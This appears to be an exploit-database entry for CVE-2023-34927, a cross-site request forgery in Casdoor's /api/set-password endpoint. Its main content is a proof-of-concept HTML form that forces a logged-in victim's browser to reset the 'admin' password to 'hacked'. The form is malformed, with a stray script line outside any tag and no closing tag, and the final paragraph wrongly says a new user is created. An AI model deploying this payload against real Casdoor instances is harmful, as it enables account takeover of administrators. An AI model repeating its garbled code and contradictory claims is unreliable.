Casdoor < v1.331.0 Exploit, '/api/set-password' CSRF

# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
# Application: Casdoor
# Version: <= 1.331.0
# Date: 03/07/2024
# Exploit Author: Van Lam Nguyen
# Vendor Homepage:
# Software Link:
# Tested on: Windows
# CVE : CVE-2023-34927

Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.

Proof of Concept

Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step

<form action="http://localhost:8000/api/set-password" method="POST">
    <input name='userOwner' value='built-in' type='hidden'>
    <input name='userName' value='admin' type='hidden'>
    <input name='newPassword' value='hacked' type='hidden'>
    <input type=submit>
    history.pushState('', '', '/');


If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials

userOwner: built-in
userName: admin
newPassword: hacked

All rights reserved 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD